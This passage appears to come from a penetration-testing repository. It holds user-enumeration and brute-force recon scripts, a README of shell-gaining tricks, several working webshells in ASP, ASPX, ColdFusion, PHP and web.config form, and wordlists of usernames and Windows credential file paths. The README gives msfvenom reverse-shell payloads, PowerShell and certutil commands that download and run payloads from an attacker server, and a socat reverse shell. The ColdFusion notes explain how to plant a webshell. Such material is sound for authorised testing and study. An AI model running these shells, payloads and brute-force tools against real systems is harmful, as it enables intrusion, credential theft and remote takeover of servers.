| domains = resp.get_domains().elements() 134 | 135 | print 'Found domain(s):' 136 | for i in range(0, resp.get_entries_num()): 137 | print " . %s" % domains[i].get_name() 138 | 139 | print "Looking up users in domain %s" % domains[0].get_name() 140 | resp = rpcsamr.lookupdomain(_context_handle, domains[0]) 141 | if resp.get_return_code() != 0: 142 | raise ListUsersException, 'LookupDomain error' 143 | 144 | resp = rpcsamr.opendomain(_context_handle, resp.get_domain_sid()) 145 | if resp.get_return_code() != 0: 146 | raise ListUsersException, 'OpenDomain error' 147 | 148 | domain_context_handle = resp.get_context_handle() 149 | resp = rpcsamr.enumusers(domain_context_handle) 150 | if resp.get_return_code() != 0 and resp.get_return_code() != 0x105: 151 | raise ListUsersException, 'OpenDomainUsers error' 152 | 153 | done = False 154 | while done is False: 155 | for user in resp.get_users().elements(): 156 | uname = user.get_name().encode(encoding, 'replace') 157 | uid = user.get_id() 158 | 159 | r = rpcsamr.openuser(domain_context_handle, uid) 160 | print "Found user: %s, uid = %d" % (uname, uid) 161 | 162 | if r.get_return_code() == 0: 163 | info = rpcsamr.queryuserinfo(r.get_context_handle()).get_user_info() 164 | entry = (uname, uid, info) 165 | entries.append(entry) 166 | c = rpcsamr.closerequest(r.get_context_handle()) 167 | 168 | # Do we have more users? 169 | if resp.get_return_code() == 0x105: 170 | resp = rpcsamr.enumusers(domain_context_handle, resp.get_resume_handle()) 171 | else: 172 | done = True 173 | except ListUsersException, e: 174 | print "Error listing users: %s" % e 175 | 176 | dce.disconnect() 177 | 178 | return entries 179 | 180 | 181 | # Process command-line arguments. 182 | if __name__ == '__main__': 183 | print version.BANNER 184 | 185 | parser = argparse.ArgumentParser() 186 | 187 | parser.add_argument('target', action='store', help='[domain/][username[:password]@]

') 188 | parser.add_argument('protocol', choices=SAMRDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)') 189 | 190 | group = parser.add_argument_group('authentication') 191 | 192 | group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') 193 | if len(sys.argv)==1: 194 | parser.print_help() 195 | sys.exit(1) 196 | 197 | options = parser.parse_args() 198 | 199 | import re 200 | 201 | domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('') 202 | 203 | if domain is None: 204 | domain = '' 205 | 206 | dumper = SAMRDump(options.protocol, username, password, domain, options.hashes) 207 | dumper.dump(address) 208 | -------------------------------------------------------------------------------- /recon_scan/smbrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import subprocess 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: smbrecon.py " 7 | sys.exit(0) 8 | 9 | ip = sys.argv[1] 10 | NBTSCAN = "python samrdump.py %s" % (ip) 11 | nbtresults = subprocess.check_output(NBTSCAN, shell=True) 12 | if ("Connection refused" not in nbtresults) and ("Connect error" not in nbtresults) and ("Connection reset" not in nbtresults): 13 | print "[*] SAMRDUMP User accounts/domains found on " + ip 14 | lines = nbtresults.split("\n") 15 | for line in lines: 16 | if ("Found" in line) or (" . " in line): 17 | print " [+] " + line 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /recon_scan/smtp-user-enum.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # smtp-user-enum - Brute Force Usernames via EXPN/VRFY/RCPT TO 3 | # Copyright (C) 2008 pentestmonkey@pentestmonkey.net 4 | # 5 | # This program is free software; you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License version 2 as 7 | # published by the Free Software Foundation. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | # GNU General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License along 15 | # with this program; if not, write to the Free Software Foundation, Inc., 16 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 17 | # 18 | # This tool may be used for legal purposes only. Users take full responsibility 19 | # for any actions performed using this tool. If these terms are not acceptable to 20 | # you, then do not use this tool. 21 | # 22 | # You are encouraged to send comments, improvements or suggestions to 23 | # me at smtp-user-enum@pentestmonkey.net 24 | # 25 | # This program is derived from dns-grind v1.0 ( http://pentestmonkey.net/tools/dns-grind ) 26 | # 27 | 28 | use strict; 29 | use Socket; 30 | use IO::Handle; 31 | use IO::Select; 32 | use IO::Socket::INET; 33 | use Getopt::Std; 34 | $| = 1; 35 | 36 | my $VERSION = "1.2"; 37 | my $debug = 0; 38 | my @child_handles = (); 39 | my $verbose = 0; 40 | my $max_procs = 5; 41 | my $smtp_port = 25; 42 | my @usernames = (); 43 | my @hosts = (); 44 | my $recursive_flag = 1; 45 | my $query_timeout = 5; 46 | my $mode = "VRFY"; 47 | my $from_address = 'user@example.com'; 48 | my $start_time = time(); 49 | my $end_time; 50 | my $kill_child_string = "\x00"; 51 | $SIG{CHLD} = 'IGNORE'; # auto-reap 52 | my %opts; 53 | my $usage=<; 134 | } 135 | 136 | if (defined($host_file)) { 137 | open(FILE, "<$host_file") or die "ERROR: Can't open username file $host_file: $!\n"; 138 | @hosts = map { chomp($_); $_ } ; 139 | } 140 | 141 | if (defined($username)) { 142 | push @usernames, $username; 143 | } 144 | 145 | if (defined($host)) { 146 | push @hosts, $host; 147 | } 148 | 149 | if (defined($host_file) and not @hosts) { 150 | print "ERROR: Targets file $host_file was empty\n"; 151 | exit 1; 152 | } 153 | 154 | if (defined($username_file) and not @usernames) { 155 | print "ERROR: Username file $username_file was empty\n"; 156 | exit 1; 157 | } 158 | 159 | print "Starting smtp-user-enum v$VERSION ( http://pentestmonkey.net/tools/smtp-user-enum )\n"; 160 | print "\n"; 161 | print " ----------------------------------------------------------\n"; 162 | print "| Scan Information |\n"; 163 | print " ----------------------------------------------------------\n"; 164 | print "\n"; 165 | print "Mode ..................... $mode\n"; 166 | print "Worker Processes ......... $max_procs\n"; 167 | print "Targets file ............. $host_file\n" if defined($host_file); 168 | print "Usernames file ........... $username_file\n" if defined($username_file); 169 | print "Target count ............. " . scalar(@hosts) . "\n" if @hosts; 170 | print "Username count ........... " . scalar(@usernames) . "\n" if @usernames; 171 | print "Target TCP port .......... $smtp_port\n"; 172 | print "Query timeout ............ $query_timeout secs\n"; 173 | print "Target domain ............ $domain\n" if defined($domain); 174 | print "\n"; 175 | print "######## Scan started at " . scalar(localtime()) . " #########\n"; 176 | 177 | # Spawn off correct number of children 178 | foreach my $proc_count (1..$max_procs) { 179 | socketpair(my $child, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; 180 | $child->autoflush(1); 181 | $parent->autoflush(1); 182 | 183 | # Parent executes this 184 | if (my $pid = fork) { 185 | close $parent; 186 | print "[Parent] Spawned child with PID $pid to do resolving\n" if $debug; 187 | push @child_handles, $child; 188 | 189 | # Child executes this 190 | } else { 191 | close $child; 192 | while (1) { 193 | my $timed_out = 0; 194 | 195 | # Read host and username from parent 196 | my $line = <$parent>; 197 | chomp($line); 198 | my ($host, $username, $domain) = $line =~ /^(\S+)\t(.*)\t(.*)$/; 199 | 200 | # Append domain to username if a domain was supplied 201 | $username = $username . "@" . $domain if (defined($domain) and $domain); 202 | 203 | # Exit if told to by parent 204 | if ($line eq $kill_child_string) { 205 | print "[Child $$] Exiting\n" if $debug; 206 | exit 0; 207 | } 208 | 209 | # Sanity check host and username 210 | if (defined($host) and defined($username)) { 211 | print "[Child $$] Passed host $host and username $username\n" if $debug; 212 | } else { 213 | print "[Child $$] WARNING: Passed garbage. Ignoring: $line\n"; 214 | next; 215 | } 216 | 217 | # Do smtp query with timeout 218 | my $response; 219 | eval { 220 | local $SIG{ALRM} = sub { die "alarm\n" }; 221 | alarm $query_timeout; 222 | my $s = IO::Socket::INET->new( PeerAddr => $host, 223 | PeerPort => $smtp_port, 224 | Proto => 'tcp' 225 | ) 226 | or die "Can't connect to $host:$smtp_port: $!\n"; 227 | my $buffer; 228 | $s->recv($buffer, 10000); # recv banner 229 | if ($mode eq "VRFY") { 230 | $s->send("HELO x\r\n"); 231 | $s->recv($buffer, 10000); 232 | $s->send("VRFY $username\r\n"); 233 | $s->recv($buffer, 10000); 234 | } elsif ($mode eq "EXPN") { 235 | $s->send("HELO x\r\n"); 236 | $s->recv($buffer, 10000); 237 | $s->send("EXPN $username\r\n"); 238 | $s->recv($buffer, 10000); 239 | } elsif ($mode eq "RCPT") { 240 | $s->send("HELO x\r\n"); 241 | $s->recv($buffer, 10000); 242 | $s->send("MAIL FROM:$from_address\r\n"); 243 | $s->recv($buffer, 10000); 244 | $s->send("RCPT TO:$username\r\n"); 245 | $s->recv($buffer, 10000); 246 | } else { 247 | print "ERROR: Unknown mode in use\n"; 248 | exit 1; 249 | } 250 | $response .= $buffer; 251 | alarm 0; 252 | }; 253 | 254 | # if ($@) { 255 | # $timed_out = 1; 256 | # print "[Child $$] Timeout for username $username on host $host\n" if $debug; 257 | # } 258 | 259 | my $trace; 260 | if ($debug) { 261 | $trace = "[Child $$] $host: $username "; 262 | } else { 263 | $trace = "$host: $username "; 264 | } 265 | 266 | if ($response and not $timed_out) { 267 | 268 | # Negative result 269 | if ($response =~ /5\d\d \S+/s) { 270 | print $parent $trace . "\n"; 271 | next; 272 | 273 | # Postive result 274 | } elsif ($response =~ /2\d\d \S+/s) { 275 | print $parent $trace . "exists\n"; 276 | next; 277 | 278 | # Unknown response 279 | } else { 280 | $response =~ s/[\n\r]/./g; 281 | print $parent $trace . "$response\n"; 282 | next; 283 | } 284 | } 285 | 286 | if ($timed_out) { 287 | print $parent $trace . "\n"; 288 | } else { 289 | if (!$response) { 290 | print $parent $trace . "\n"; 291 | } 292 | } 293 | } 294 | exit; 295 | } 296 | } 297 | 298 | # Fork once more to make a process that will us usernames and hosts 299 | socketpair(my $get_next_query, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; 300 | $get_next_query->autoflush(1); 301 | $parent->autoflush(1); 302 | 303 | # Parent executes this 304 | if (my $pid = fork) { 305 | close $parent; 306 | 307 | # Chile executes this 308 | } else { 309 | # Generate queries from username-host pairs and send to parent 310 | foreach my $username (@usernames) { 311 | foreach my $host (@hosts) { 312 | my $query = $host . "\t" . $username . "\t" . $domain; 313 | print "[Query Generator] Sending $query to parent\n" if $debug; 314 | print $parent "$query\n"; 315 | } 316 | } 317 | 318 | exit 0; 319 | } 320 | 321 | printf "Created %d child processes\n", scalar(@child_handles) if $debug; 322 | my $s = IO::Select->new(); 323 | my $s_in = IO::Select->new(); 324 | $s->add(@child_handles); 325 | $s_in->add(\*STDIN); 326 | my $timeout = 0; # non-blocking 327 | my $more_queries = 1; 328 | my $outstanding_queries = 0; 329 | my $query_count = 0; 330 | my $result_count = 0; 331 | 332 | # Write to each child process once 333 | writeloop: foreach my $write_handle (@child_handles) { 334 | my $query = <$get_next_query>; 335 | if ($query) { 336 | chomp($query); 337 | print "[Parent] Sending $query to child\n" if $debug; 338 | print $write_handle "$query\n"; 339 | $outstanding_queries++; 340 | } else { 341 | print "[Parent] Quitting main loop. All queries have been read.\n" if $debug; 342 | last writeloop; 343 | } 344 | } 345 | 346 | # Keep reading from child processes until there are no more queries left 347 | # Write to a child only after it has been read from 348 | mainloop: while (1) { 349 | # Wait until there's a child that we can either read from or written to. 350 | my ($rh_aref) = IO::Select->select($s, undef, undef); # blocking 351 | 352 | print "[Parent] There are " . scalar(@$rh_aref) . " children that can be read from\n" if $debug; 353 | 354 | foreach my $read_handle (@$rh_aref) { 355 | # Read from child 356 | chomp(my $line = <$read_handle>); 357 | if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { 358 | print "$line\n"; 359 | $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); 360 | } 361 | $outstanding_queries--; 362 | $query_count++; 363 | 364 | # Write to child 365 | my $query = <$get_next_query>; 366 | if ($query) { 367 | chomp($query); 368 | print "[Parent] Sending $query to child\n" if $debug; 369 | print $read_handle "$query\n"; 370 | $outstanding_queries++; 371 | } else { 372 | print "DEBUG: Quitting main loop. All queries have been read.\n" if $debug; 373 | last mainloop; 374 | } 375 | } 376 | } 377 | 378 | # Wait to get replies back from remaining children 379 | my $count = 0; 380 | readloop: while ($outstanding_queries) { 381 | my @ready_to_read = $s->can_read(1); # blocking 382 | foreach my $child_handle (@ready_to_read) { 383 | print "[Parent] Outstanding queries: $outstanding_queries\n" if $debug; 384 | chomp(my $line = <$child_handle>); 385 | if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { 386 | print "$line\n"; 387 | $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); 388 | } 389 | print $child_handle "$kill_child_string\n"; 390 | $s->remove($child_handle); 391 | $outstanding_queries--; 392 | $query_count++; 393 | } 394 | } 395 | 396 | # Tell any remaining children to exit 397 | foreach my $handle ($s->handles) { 398 | print "[Parent] Telling child to exit\n" if $debug; 399 | print $handle "$kill_child_string\n"; 400 | } 401 | 402 | # Wait for all children to terminate 403 | while(wait != -1) {}; 404 | 405 | print "######## Scan completed at " . scalar(localtime()) . " #########\n"; 406 | print "$result_count results.\n"; 407 | print "\n"; 408 | $end_time = time(); # Second granularity only to avoid depending on hires time module 409 | my $run_time = $end_time - $start_time; 410 | $run_time = 1 if $run_time < 1; # Avoid divide by zero 411 | printf "%d queries in %d seconds (%0.1f queries / sec)\n", $query_count, $run_time, $query_count / $run_time; 412 | -------------------------------------------------------------------------------- /recon_scan/smtprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | import subprocess 5 | 6 | if len(sys.argv) != 2: 7 | print "Usage: smtprecon.py " 8 | sys.exit(0) 9 | 10 | #SMTPSCAN = "nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln* %s" % (sys.argv[1]) 11 | #results = subprocess.check_output(SMTPSCAN, shell=True) 12 | 13 | #f = open("results/smtpnmapresults.txt", "a") 14 | #f.write(results) 15 | #f.close 16 | 17 | 18 | print "INFO: Trying SMTP Enum on " + sys.argv[1] 19 | names = open('/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/namelist.txt', 'r') 20 | for name in names: 21 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | connect=s.connect((sys.argv[1],25)) 23 | banner=s.recv(1024) 24 | s.send('HELO test@test.org \r\n') 25 | result= s.recv(1024) 26 | s.send('VRFY ' + name.strip() + '\r\n') 27 | result=s.recv(1024) 28 | if ("not implemented" in result) or ("disallowed" in result): 29 | sys.exit("INFO: VRFY Command not implemented on " + sys.argv[1]) 30 | if (("250" in result) or ("252" in result) and ("Cannot VRFY" not in result)): 31 | print "[*] SMTP VRFY Account found on " + sys.argv[1] + ": " + name.strip() 32 | s.close() 33 | 34 | -------------------------------------------------------------------------------- /recon_scan/snmprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | 5 | if len(sys.argv) != 2: 6 | print "Usage: snmprecon.py " 7 | sys.exit(0) 8 | 9 | snmpdetect = 0 10 | ip_address = sys.argv[1] 11 | 12 | ONESIXONESCAN = "onesixtyone %s" % (ip_address) 13 | results = subprocess.check_output(ONESIXONESCAN, shell=True).strip() 14 | 15 | if results != "": 16 | if "Windows" in results: 17 | results = results.split("Software: ")[1] 18 | snmpdetect = 1 19 | elif "Linux" in results: 20 | results = results.split("[public] ")[1] 21 | snmpdetect = 1 22 | if snmpdetect == 1: 23 | print "[*] SNMP running on " + ip_address + "; OS Detect: " + results 24 | SNMPWALK = "snmpwalk -c public -v1 %s 1 > results/%s_snmpwalk.txt" % (ip_address, ip_address) 25 | results = subprocess.check_output(SNMPWALK, shell=True) 26 | 27 | NMAPSCAN = "nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes %s" % (ip_address) 28 | results = subprocess.check_output(NMAPSCAN, shell=True) 29 | resultsfile = "results/" + ip_address + "_snmprecon.txt" 30 | f = open(resultsfile, "w") 31 | f.write(results) 32 | f.close 33 | 34 | -------------------------------------------------------------------------------- /recon_scan/sshrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: sshrecon.py " 7 | sys.exit(0) 8 | 9 | ip_address = sys.argv[1].strip() 10 | port = sys.argv[2].strip() 11 | 12 | print "INFO: Performing hydra ssh scan against " + ip_address 13 | HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_sshhydra.txt -u %s -s %s ssh" % (ip_address, ip_address, port) 14 | try: 15 | results = subprocess.check_output(HYDRA, shell=True) 16 | resultarr = results.split("\n") 17 | for result in resultarr: 18 | if "login:" in result: 19 | print "[*] Valid ssh credentials found: " + result 20 | except: 21 | print "INFO: No valid ssh credentials found" 22 | -------------------------------------------------------------------------------- /useful_tricks/README.md: -------------------------------------------------------------------------------- 1 | ## Some useful tricks that could be useful to get a shell 2 | 3 | #### 1. I have a RCE on windows box and I need to get a shell... Wget with Powershell! 4 | 5 | * Obtain your payload with msfvenom or similar: 6 | 7 | ``` 8 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > payload.exe 9 | ``` 10 | 11 | * Execute through your RCE on windows box: 12 | 13 | ``` 14 | command = "PowerShell -Command \"wget 'http://your_controlled_server/payload.exe' -OutFile reverse.exe\"" # command to run with RCE 15 | ``` 16 | 17 | Execute your payload (now called "reverse.exe") using RCE and setup a listening with msf multi-handler. 18 | 19 | *Obs: Obviously, this method may not work well due to permission conditions and so on. This is out-of-scope... it's just a trick! :-)* 20 | 21 | #### 2. Use certutil.exe to download files inside a Windows machine 22 | 23 | ``` 24 | certutil -urlcache -split -f http://:8080/msfpayload64.exe C:\\inetpub\\wwwroot\\msfpayload64.exe 25 | ``` 26 | 27 | #### 3. Use impacket-smbserver to run payloads in a Windows target 28 | 29 | On your attacker machine, create a SMB server hosting a MSF payload (for example) 30 | 31 | ``` 32 | root@kali:/tmp# impacket-smbserver share /tmp 33 | Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies 34 | 35 | [*] Config file parsed 36 | [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 37 | [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 38 | [*] Config file parsed 39 | [*] Config file parsed 40 | [*] Config file parsed 41 | ``` 42 | 43 | Using your RCE in the Windows box (target), execute the payload: 44 | 45 | ``` 46 | C:/>\\\msfpayload.exe 47 | ``` 48 | 49 | On this way... the "msfpayload.exe" will never touch the disk. 50 | 51 | #### 4. I need to transfer files (like my payloads) between VMs/hosts 52 | 53 | * You can setup a simple web server using Python or PHP. 54 | + Python: 55 | 56 | ```python 57 | python -m SimpleHTTPServer 8080 58 | ``` 59 | 60 | And a simple HTTP server will be listening on your 8080 TCP port. 61 | 62 | + PHP: 63 | 64 | ```php 65 | php -S 127.0.0.1:8080 66 | ``` 67 | And a simple HTTP server will be listening on 127.0.0.1:8080. 68 | 69 | #### 5. Upgrading simple shells to TTYs (or something close to it) 70 | 71 | * Python with "pty": 72 | 73 | ```python 74 | python -c "import pty;pty.spawn('/bin/bash');" 75 | ``` 76 | * Socat 77 | 78 | On your localhost (attacker): 79 | 80 | ``` 81 | socat file:`tty`,raw,echo=0 tcp-listen:443 82 | ``` 83 | 84 | On your victim: 85 | 86 | ``` 87 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::443 88 | ``` 89 | 90 | ## Interesting links to read! 91 | 92 | I *REALLY* recommend this link: https://bitvijays.github.io/LFC-VulnerableMachines.html 93 | https://blog.ropnop.com/transferring-files-from-kali-to-windows/ (A lot of techniques to transfer files from attacker machine to a windows box) 94 | https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ (Upgrading simple shells techniques) 95 | -------------------------------------------------------------------------------- /webshells/asp/list.asp: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 | <% 16 | 17 | file=request("file") 18 | tipo=request("type") 19 | 20 | If file="" then 21 | file="c:\" 22 | tipo="1" 23 | End If 24 | 25 | %> 26 | 27 | 28 |
29 | 30 | 31 | 32 |
33 | 34 | 35 | <% 36 | 37 | If tipo="1" then 38 | Response.Write("

PATH: " & file & "

") 39 | ListFolder(file) 40 | End If 41 | 42 | If tipo="2" then 43 | Response.Write("

FILE: " & file & "

") 44 | 45 | Set oStr = server.CreateObject("Scripting.FileSystemObject") 46 | Set oFich = oStr.OpenTextFile(file, 1) 47 | 48 | Response.Write("
--
") 49 | 50 | Response.Write(oFich.ReadAll) 51 | 52 | Response.Write("
--
") 53 | 54 | End If 55 | %> 56 | 57 | <% 58 | 59 | sub ListFolder(path) 60 | 61 | set fs = CreateObject("Scripting.FileSystemObject") 62 | set folder = fs.GetFolder(path) 63 | 64 | Response.Write("
( ) " & ".." & "" & vbCrLf) 65 | 66 | for each item in folder.SubFolders 67 | Response.Write("
( ) " & item.Name & "" & vbCrLf) 68 | next 69 | 70 | for each item in folder.Files 71 | Response.Write("
  • " & item.Name & " - " & item.Size & " bytes, " & "
  • " & vbCrLf) 72 | next 73 | 74 | end sub 75 | 76 | %> 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /webshells/asp/webshell.asp: -------------------------------------------------------------------------------- 1 | 9 | 10 | 11 | <% 12 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 13 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 14 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 15 | Function getCommandOutput(theCommand) 16 | Dim objShell, objCmdExec 17 | Set objShell = CreateObject("WScript.Shell") 18 | Set objCmdExec = objshell.exec(thecommand) 19 | getCommandOutput = objCmdExec.StdOut.ReadAll 20 | end Function 21 | %> 22 | 23 | 24 | 25 | 26 |
    27 | 28 | 29 |
    30 |
    31 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
    32 | <%Response.Write(Request.ServerVariables("server_name"))%>
    33 | 

    34 | The server's port: 35 | <%Response.Write(Request.ServerVariables("server_port"))%> 36 |

    37 |

    38 | The server's software: 39 | <%Response.Write(Request.ServerVariables("server_software"))%> 40 |

    41 |

    42 | The server's software: 43 | <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> 44 | <% szCMD = request("cmd") 45 | thisDir = getCommandOutput("cmd /c" & szCMD) 46 | Response.Write(thisDir)%> 47 |

    48 |
    49 | 50 | 51 | -------------------------------------------------------------------------------- /webshells/asp/webshell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import namespace="System.Diagnostics"%> 3 | <%@ Import Namespace="System.IO" %> 4 | 5 | 6 | 7 | 70 | 71 | 72 | 73 | Command 74 | 75 | 76 |
    77 |
    78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 |
    Auth Key:
    Command:
     
    91 |
    92 |
    93 | 94 | 95 | 96 | 97 | -------------------------------------------------------------------------------- /webshells/coldfusion/README.md: -------------------------------------------------------------------------------- 1 | 1. Access "Debugging and Logging">"Scheduled Tasks". (Coldfusion 6-10) 2 | 2. In URL, put the address of your web server hosting the webshell: http://172.20.1.27:8080/cmd.cfml 3 | 3. In "File" field: C:\Inetpub\wwwroot\cmd.cfml 4 | 4. Execute the task. 5 | 6 | Access http://target.com/cmd.cfml 7 | -------------------------------------------------------------------------------- /webshells/coldfusion/cmd.cfml: -------------------------------------------------------------------------------- 1 | 2 | 18 | 19 | 20 |
    21 | 22 | 23 | 24 |
    25 | 26 | 27 | 31 | 32 |
    33 |
    #output#
    34 |
    35 |
    36 |
    37 | 38 | 39 | -------------------------------------------------------------------------------- /webshells/php/cmd.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /webshells/web.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | <% 21 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 22 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 23 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 24 | 25 | szCMD = request("cmd") 26 | 27 | If (szCMD <> "") Then 28 | szTempFile = "c:\inetpub\wwwroot\uploadedfiles\" & oFileSys.GetTempName( ) 29 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 30 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 31 | End If 32 | %> 33 | 34 | 35 | 36 |
    37 | 38 | 39 |
    40 |
    41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
    42 | 
    43 | <% 44 | If (IsObject(oFile)) Then 45 | On Error Resume Next 46 | Response.Write Server.HTMLEncode(oFile.ReadAll) 47 | oFile.Close 48 | Call oFileSys.DeleteFile(szTempFile, True) 49 | End If 50 | %> 51 | 52 | 53 | -------------------------------------------------------------------------------- /wordlists/README.md: -------------------------------------------------------------------------------- 1 | For passwords: /usr/share/wordlists/rockyou.txt 2 | -------------------------------------------------------------------------------- /wordlists/unix_users.txt: -------------------------------------------------------------------------------- 1 | 2 | 4Dgifts 3 | EZsetup 4 | OutOfBox 5 | ROOT 6 | adm 7 | admin 8 | administrator 9 | anon 10 | auditor 11 | avahi 12 | avahi-autoipd 13 | backup 14 | bbs 15 | bin 16 | checkfs 17 | checkfsys 18 | checksys 19 | cmwlogin 20 | couchdb 21 | daemon 22 | dbadmin 23 | demo 24 | demos 25 | diag 26 | distccd 27 | dni 28 | fal 29 | fax 30 | ftp 31 | games 32 | gdm 33 | gnats 34 | gopher 35 | gropher 36 | guest 37 | haldaemon 38 | halt 39 | hplip 40 | informix 41 | install 42 | irc 43 | karaf 44 | kernoops 45 | libuuid 46 | list 47 | listen 48 | lp 49 | lpadm 50 | lpadmin 51 | lynx 52 | mail 53 | man 54 | me 55 | messagebus 56 | mountfs 57 | mountfsys 58 | mountsys 59 | news 60 | noaccess 61 | nobody 62 | nobody4 63 | nuucp 64 | nxpgsql 65 | operator 66 | oracle 67 | pi 68 | popr 69 | postgres 70 | postmaster 71 | printer 72 | proxy 73 | pulse 74 | rfindd 75 | rje 76 | root 77 | rooty 78 | saned 79 | service 80 | setup 81 | sgiweb 82 | sigver 83 | speech-dispatcher 84 | sshd 85 | sym 86 | symop 87 | sync 88 | sys 89 | sysadm 90 | sysadmin 91 | sysbin 92 | syslog 93 | system_admin 94 | trouble 95 | udadmin 96 | ultra 97 | umountfs 98 | umountfsys 99 | umountsys 100 | unix 101 | us_admin 102 | user 103 | uucp 104 | uucpadm 105 | web 106 | webmaster 107 | www 108 | www-data 109 | xpdb 110 | xpopr 111 | zabbix 112 | vagrant 113 | -------------------------------------------------------------------------------- /wordlists/windows_interesting_files: -------------------------------------------------------------------------------- 1 | C:\Users\Administrator\NTUser.dat 2 | C:\Documents and Settings\Administrator\NTUser.dat 3 | C:\apache\logs\access.log 4 | C:\apache\logs\error.log 5 | C:\apache\php\php.ini 6 | C:\boot.ini 7 | C:\inetpub\wwwroot\global.asa 8 | C:\MySQL\data\hostname.err 9 | C:\MySQL\data\mysql.err 10 | C:\MySQL\data\mysql.log 11 | C:\MySQL\my.cnf 12 | C:\MySQL\my.ini 13 | C:\php4\php.ini 14 | C:\php5\php.ini 15 | C:\php\php.ini 16 | C:\Program Files\Apache Group\Apache2\conf\httpd.conf 17 | C:\Program Files\Apache Group\Apache\conf\httpd.conf 18 | C:\Program Files\Apache Group\Apache\logs\access.log 19 | C:\Program Files\Apache Group\Apache\logs\error.log 20 | C:\Program Files\FileZilla Server\FileZilla Server.xml 21 | C:\Program Files\MySQL\data\hostname.err 22 | C:\Program Files\MySQL\data\mysql-bin.log 23 | C:\Program Files\MySQL\data\mysql.err 24 | C:\Program Files\MySQL\data\mysql.log 25 | C:\Program Files\MySQL\my.ini 26 | C:\Program Files\MySQL\my.cnf 27 | C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err 28 | C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log 29 | C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err 30 | C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log 31 | C:\Program Files\MySQL\MySQL Server 5.0\my.cnf 32 | C:\Program Files\MySQL\MySQL Server 5.0\my.ini 33 | C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf 34 | C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf 35 | C:\Program Files (x86)\Apache Group\Apache\conf\access.log 36 | C:\Program Files (x86)\Apache Group\Apache\conf\error.log 37 | C:\Program Files (x86)\FileZilla Server\FileZilla Server.xml 38 | C:\Program Files (x86)\xampp\apache\conf\httpd.conf 39 | C:\WINDOWS\php.ini 40 | C:\WINDOWS\Repair\SAM 41 | C:\Windows\repair\system 42 | C:\Windows\repair\software 43 | C:\Windows\repair\security 44 | C:\WINDOWS\System32\drivers\etc\hosts 45 | C:\Windows\win.ini 46 | C:\WINNT\php.ini 47 | C:\WINNT\win.ini 48 | C:\xampp\apache\bin\php.ini 49 | C:\xampp\apache\logs\access.log 50 | C:\xampp\apache\logs\error.log 51 | C:\Windows\Panther\Unattend\Unattended.xml 52 | C:\Windows\Panther\Unattended.xml 53 | C:\Windows\debug\NetSetup.log 54 | C:\Windows\system32\config\AppEvent.Evt 55 | 